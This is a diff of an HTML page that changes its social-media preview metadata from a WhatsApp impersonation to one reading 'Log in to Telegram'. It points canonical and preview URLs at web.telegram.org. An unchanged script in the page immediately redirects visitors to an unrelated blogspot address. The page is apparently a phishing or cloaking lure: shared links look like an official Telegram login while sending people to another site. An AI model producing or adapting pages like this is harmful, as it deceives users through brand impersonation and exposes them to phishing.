--- a/index.html
+++ b/index.html
@@ -8,24 +8,24 @@
     <meta property=fb:app_id content="180444840287" />
     <meta property=fb:admin content="237344263766628" />
     <meta property=fb:locale content="en_US" />
-    <meta property="og:title" content="My Whatsapp">
+    <meta property="og:title" content="Log in to Telegram">
     <meta property="og:description" content="My Whatsapp">
-    <meta property="og:image" content="https://cdn6.aptoide.com/imgs/c/7/6/c7644008f58970f3d495d2d68958652a_fgraphic.png">
-    <meta property="og:author" content="">
-    <meta property="og:url" content="https://www.whatsapp.com">
-    <link href="https://cdn6.aptoide.com/imgs/c/7/6/c7644008f58970f3d495d2d68958652a_fgraphic.png" rel="alternate" media="only screen and (max-width: 640px)">
-    <link rel="canonical" href="https://www.whatsapp.com">
+    <meta property="og:image" content="https://img001.prntscr.com/file/img001/jIan6-IpTHyyhmCZ_wrLTg.png">
+    <meta property="og:author" content="hero">
+    <meta property="og:url" content="https://web.telegram.org">
+    <link href="https://img001.prntscr.com/file/img001/jIan6-IpTHyyhmCZ_wrLTg.png" rel="alternate" media="only screen and (max-width: 640px)">
+    <link rel="canonical" href="https://web.telegram.org">
     <meta name=twitter:app:country content=US />
-    <meta property="twitter:title" content="My Whatsapp">
-    <meta property="twitter:description" content="My Whatsapp">
+    <meta property="twitter:title" content="Log in to Telegram">
+    <meta property="twitter:description" content="Log in to Telegram">
     <meta property="twitter:card" content="summary_large_image">
-    <meta property="twitter:image" content="https://cdn6.aptoide.com/imgs/c/7/6/c7644008f58970f3d495d2d68958652a_fgraphic.png">
-    <meta property="twitter:url" content="https://www.whatsapp.com">
+    <meta property="twitter:image" content="https://img001.prntscr.com/file/img001/jIan6-IpTHyyhmCZ_wrLTg.png">
+    <meta property="twitter:url" content="https://web.telegram.org">
     <title>My Whatsapp</title>
 </head>
 <body>
     <h1>My Whatsapp</h1>
-    <img src="https://cdn6.aptoide.com/imgs/c/7/6/c7644008f58970f3d495d2d68958652a_fgraphic.png" alt="My Whatsapp">
+    <img src="https://img001.prntscr.com/file/img001/jIan6-IpTHyyhmCZ_wrLTg.png" alt="Log in to Telegram">
   <script type="text/JavaScript">
 setTimeout("location.href = 'https://xfgy6563.blogspot.com/?m=1';",0);//menentukan waktu hitung dalam mili second (detik)
 </script>
